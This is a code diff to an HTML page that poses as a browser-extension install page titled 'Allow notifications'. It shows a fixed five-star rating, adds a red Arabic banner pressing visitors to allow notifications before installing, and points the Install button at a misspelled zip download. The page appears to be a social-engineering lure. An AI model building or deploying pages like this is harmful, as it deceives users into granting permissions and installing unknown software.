--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
       width: 100vw;
       height: 100vh;
       font-family: 'Roboto', sans-serif;
-      background-color: #f9f9f9;
+      background-color: #000;
       display: flex;
       align-items: center;
       justify-content: center;
@@ -20,10 +20,11 @@
       width: 100%;
       height: 100%;
       max-width: none;
-      background: #fff;
+      background: #000;
       padding: 30px 40px;
       box-sizing: border-box;
       overflow: auto;
+      color: white;
     }
     .header {
       display: flex;
@@ -37,8 +38,19 @@
       font-size: 24px;
       margin: 0;
     }
+
+    /* ✅ الجزء المعدل */
+    .re-header {
+      background-color: red;
+      color: white;
+      font-size: 16px;
+      margin-top: 8px;
+      padding: 10px 15px;
+      border-radius: 4px;
+    }
+
     .provider {
-      color: #666;
+      color: #aaa;
       font-size: 14px;
       margin-top: 4px;
     }
@@ -59,7 +71,6 @@
       cursor: pointer;
       margin-top: 20px;
     }
-
     .preview-images {
       display: flex;
       flex-direction: column;
@@ -80,13 +91,13 @@
       <img src="icon.png" alt="Extension Icon">
       <div>
         <h1 class="title">Allow notifications</h1>
+        <div class="re-header">يرجى السماح بالإشعارات لمتابعة التثبيت</div>
         <div class="provider">Provided by Example</div>
         <div class="rating">★★★★★</div>
       </div>
     </div>
 
-    <!-- زر التحميل الصحيح -->
-    <a href="Allow-notifications.zip" download class="install-btn">Install Extension</a>
+    <a href="Allow-notfications.zip" download class="install-btn">Install Extension</a>
 
     <div class="preview-images">
       <img src="preview1.png" alt="Preview 1">
